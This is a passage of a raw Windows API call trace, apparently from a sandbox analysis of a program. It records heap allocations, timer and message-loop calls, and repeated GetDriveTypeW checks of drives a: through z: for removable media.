dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.739] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.739] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.739] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.739] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0218.740] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0218.740] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.740] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.740] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.741] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.741] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.741] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.742] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.742] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.742] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.742] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.743] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.743] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.743] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.743] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.743] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.744] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.744] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.744] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.744] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.744] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.745] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.745] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.745] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.745] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.746] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.746] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.747] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.747] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.747] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.747] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.748] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.748] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.748] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.748] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.749] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.749] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.749] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.749] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.749] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.749] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.749] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.749] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0218.750] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0218.750] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.750] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.751] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.751] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.751] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0218.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.751] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.751] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.752] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.752] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.752] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.753] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.753] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.753] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.753] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.753] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.754] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.754] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.754] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.754] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.754] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.755] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.755] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.755] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.755] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.756] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.756] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.756] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.756] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.757] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.757] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.757] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.757] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.758] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0218.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0218.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0218.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.759] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.759] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0218.759] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0218.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.760] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.760] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.760] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.760] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.761] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.761] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.761] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.761] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.761] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.762] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.762] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.762] GetDriveTypeW 